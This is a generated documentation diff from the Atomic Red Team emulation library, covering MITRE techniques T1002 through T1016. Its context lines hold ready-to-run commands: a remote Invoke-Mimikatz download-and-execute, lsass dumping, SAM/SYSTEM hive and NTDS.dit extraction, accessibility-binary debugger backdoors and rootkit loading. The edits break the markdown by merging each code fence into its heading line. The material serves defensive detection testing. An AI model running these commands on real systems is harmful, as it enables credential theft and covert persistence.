Generate docs from job=validate_atomics_generate_docs branch=master

atomics/T1002/T1002.md

@@ -29,8 +29,7 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
 | input_file | Path that should be compressed into our output file | Path | C:\*|
 | output_file | Path where resulting compressed data should be placed | Path | C:\test\Data.zip|
 
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
 dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
 ```
 <br/>
@@ -48,8 +47,7 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
 | input_file | Path that should be compressed into our output file | Path | *.docx|
 | output_file | Path where resulting compressed data should be placed | Path | exfilthis.rar|
 
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 rar a -r #{output_file} #{input_file}
 ```
 <br/>
@@ -67,8 +65,7 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
 | input_files | Path that should be compressed into our output file, may include wildcards | Path | /tmp/victim-files/*|
 | output_file | Path that should be output as a zip archive | Path | /tmp/victim-files.zip|
 
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 zip #{output_file} #{input_files}
 ```
 <br/>
@@ -85,8 +82,7 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
 |------|-------------|------|---------------|
 | input_file | Path that should be compressed | Path | /tmp/victim-gzip.txt|
 
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 gzip -f #{input_file}
 ```
 <br/>
@@ -104,8 +100,7 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
 | input_file_folder | Path that should be compressed | Path | /tmp/victim-files/|
 | output_file | File that should be output | Path | /tmp/victim-files.tar.gz|
 
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 tar -cvzf #{output_file} #{input_file_folder}
 ```
 <br/>

atomics/T1003/T1003.md

@@ -169,8 +169,7 @@ Dumps Credentials via Powershell by invoking a remote mimikatz script
 |------|-------------|------|---------------|
 | remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1|
 
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
 IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
 ```
 <br/>
@@ -182,8 +181,7 @@ https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5
 **Supported Platforms:** Windows
 
 
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 gsecdump -a
 ```
 <br/>
@@ -200,8 +198,7 @@ http://www.ampliasecurity.com/research/windows-credentials-editor/
 |------|-------------|------|---------------|
 | output_file | Path where resulting data should be placed | Path | output.txt|
 
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 wce -o #{output_file}
 ```
 <br/>
@@ -214,8 +211,7 @@ via three registry keys. Then processed locally using https://github.com/Neohaps
 **Supported Platforms:** Windows
 
 
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 reg save HKLM\sam sam
 reg save HKLM\system system
 reg save HKLM\security security
@@ -235,8 +231,7 @@ ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysin
 |------|-------------|------|---------------|
 | output_file | Path where resulting dump should be placed | Path | lsass_dump.dmp|
 
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 procdump.exe -accepteula -ma lsass.exe #{output_file}
 ```
 <br/>
@@ -249,8 +244,7 @@ Manager and administrative permissions.
 **Supported Platforms:** Windows
 
 
-#### Run it with these steps!
-1. Open Task Manager:
+#### Run it with these steps! 1. Open Task Manager:
   On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
   on the task bar and selecting "Task Manager".
 
@@ -277,8 +271,7 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
 |------|-------------|------|---------------|
 | input_file | Path where resulting dump should be placed | Path | lsass_dump.dmp|
 
-#### Run it with these steps!
-1. Open Mimikatz:
+#### Run it with these steps! 1. Open Mimikatz:
   Execute `mimikatz` at a command prompt.
 
 2. Select a Memory Dump:
@@ -304,8 +297,7 @@ subsequent domain controllers without the need of network-based replication.
 |------|-------------|------|---------------|
 | output_folder | Path where resulting dump should be placed | Path | C:\Atomic_Red_Team|
 
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
 ```
 <br/>
@@ -322,8 +314,7 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
 |------|-------------|------|---------------|
 | drive_letter | Drive letter to source VSC (including colon) | String | C:|
 
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 vssadmin.exe create shadow /for=#{drive_letter}
 ```
 <br/>
@@ -345,8 +336,7 @@ This test must be executed on a Windows Domain Controller.
 | vsc_name | Name of Volume Shadow Copy | String | \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1|
 | extract_path | Path for extracted NTDS.dit | Path | C:\Extract|
 
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
 copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
 reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE

atomics/T1004/T1004.md

@@ -32,8 +32,7 @@ PowerShell code to set Winlogon shell key to execute a binary at logon along wit
 |------|-------------|------|---------------|
 | binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe|
 
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
 Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force
 ```
 <br/>
@@ -50,8 +49,7 @@ PowerShell code to set Winlogon userinit key to execute a binary at logon along
 |------|-------------|------|---------------|
 | binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe|
 
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
 Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
 ```
 <br/>
@@ -68,8 +66,7 @@ PowerShell code to set Winlogon Notify key to execute a notification package DLL
 |------|-------------|------|---------------|
 | binary_to_execute | Path of notification package to execute | Path | C:\Windows\Temp\atomicNotificationPackage.dll|
 
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
 New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
 Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
 ```

atomics/T1005/T1005.md

@@ -22,8 +22,7 @@ This test uses `grep` to search a macOS Safari binaryCookies file for specified
 |------|-------------|------|---------------|
 | search_string | String to search Safari cookies to find. | string | coinbase|
 
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 cd ~/Library/Cookies
 grep -q "#{search_string}" "Cookies.binarycookies"
 ```

atomics/T1007/T1007.md

@@ -22,8 +22,7 @@ Identify system services
 |------|-------------|------|---------------|
 | service_name | Name of service to start stop, query | string | svchost.exe|
 
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 tasklist.exe
 sc query
 sc query state= all
@@ -45,8 +44,7 @@ Enumerates started system services using net.exe and writes them to a file. This
 |------|-------------|------|---------------|
 | output_file | Path of file to hold net.exe output | Path | C:\Windows\Temp\service-list.txt|
 
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 net.exe start >> #{output_file}
 ```
 <br/>

atomics/T1009/T1009.md

@@ -20,8 +20,7 @@ Uses dd to add a zero to the binary to change the hash
 |------|-------------|------|---------------|
 | file_to_pad | Path of binary to be padded | Path | /tmp/evil-binary|
 
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
 ```
 <br/>

atomics/T1010/T1010.md

@@ -23,8 +23,7 @@ Compiles and executes C# code to list main window titles associated with each pr
 | input_source_code | Path to source of C# code | path | C:\AtomicRedTeam\atomics\T1010\src\T1010.cs|
 | output_file_name | Name of output binary | string | T1010.exe|
 
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code}
 #{output_file_name}
 ```

atomics/T1012/T1012.md

@@ -28,8 +28,7 @@ https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_
 **Supported Platforms:** Windows
 
 
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
 reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
 reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

atomics/T1014/T1014.md

@@ -26,8 +26,7 @@ Loadable Kernel Module based Rootkit
 |------|-------------|------|---------------|
 | rootkit_file | Path To Module | String | Module.ko|
 
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 sudo insmod #{rootkit_file}
 ```
 <br/>
@@ -44,8 +43,7 @@ Loadable Kernel Module based Rootkit
 |------|-------------|------|---------------|
 | rootkit_file | Path To Module | String | Module.ko|
 
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 sudo modprobe #{rootkit_file}
 ```
 <br/>
@@ -69,8 +67,7 @@ It would be wise if you only run this in a test environment
 |------|-------------|------|---------------|
 | driver_path | Path to the vulnerable driver | Path | C:\Drivers\driver.sys|
 
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 puppetstrings #{driver_path}
 ```
 <br/>

atomics/T1015/T1015.md

@@ -48,8 +48,7 @@ This allows adversaries to execute the attached process
 |------|-------------|------|---------------|
 | target_executable | File You Want To Attach cmd To | String | osk.exe|
 
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
 ```
 <br/>
@@ -66,8 +65,7 @@ This allows adversaries to execute the attached process
 |------|-------------|------|---------------|
 | target_executable | File You Want To Attach cmd To | String | sethc.exe|
 
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
 ```
 <br/>
@@ -84,8 +82,7 @@ This allows adversaries to execute the attached process
 |------|-------------|------|---------------|
 | target_executable | File You Want To Attach cmd To | String | utilman.exe|
 
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
 ```
 <br/>
@@ -102,8 +99,7 @@ This allows adversaries to execute the attached process
 |------|-------------|------|---------------|
 | target_executable | File You Want To Attach cmd To | String | magnify.exe|
 
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
 ```
 <br/>
@@ -120,8 +116,7 @@ This allows adversaries to execute the attached process
 |------|-------------|------|---------------|
 | target_executable | File You Want To Attach cmd To | String | narrator.exe|
 
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
 ```
 <br/>
@@ -138,8 +133,7 @@ This allows adversaries to execute the attached process
 |------|-------------|------|---------------|
 | target_executable | File You Want To Attach cmd To | String | DisplaySwitch.exe|
 
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
 ```
 <br/>
@@ -156,8 +150,7 @@ This allows adversaries to execute the attached process
 |------|-------------|------|---------------|
 | target_executable | File You Want To Attach cmd To | String | atbroker.exe|
 
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
 ```
 <br/>

atomics/T1016/T1016.md

@@ -17,8 +17,7 @@ Identify network configuration information
 **Supported Platforms:** Windows
 
 
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 ipconfig /all
 netsh interface show
 arp -a
@@ -34,8 +33,7 @@ Identify network configuration information
 **Supported Platforms:** macOS, Linux
 
 
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
 arp -a
 netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c
 ifconfig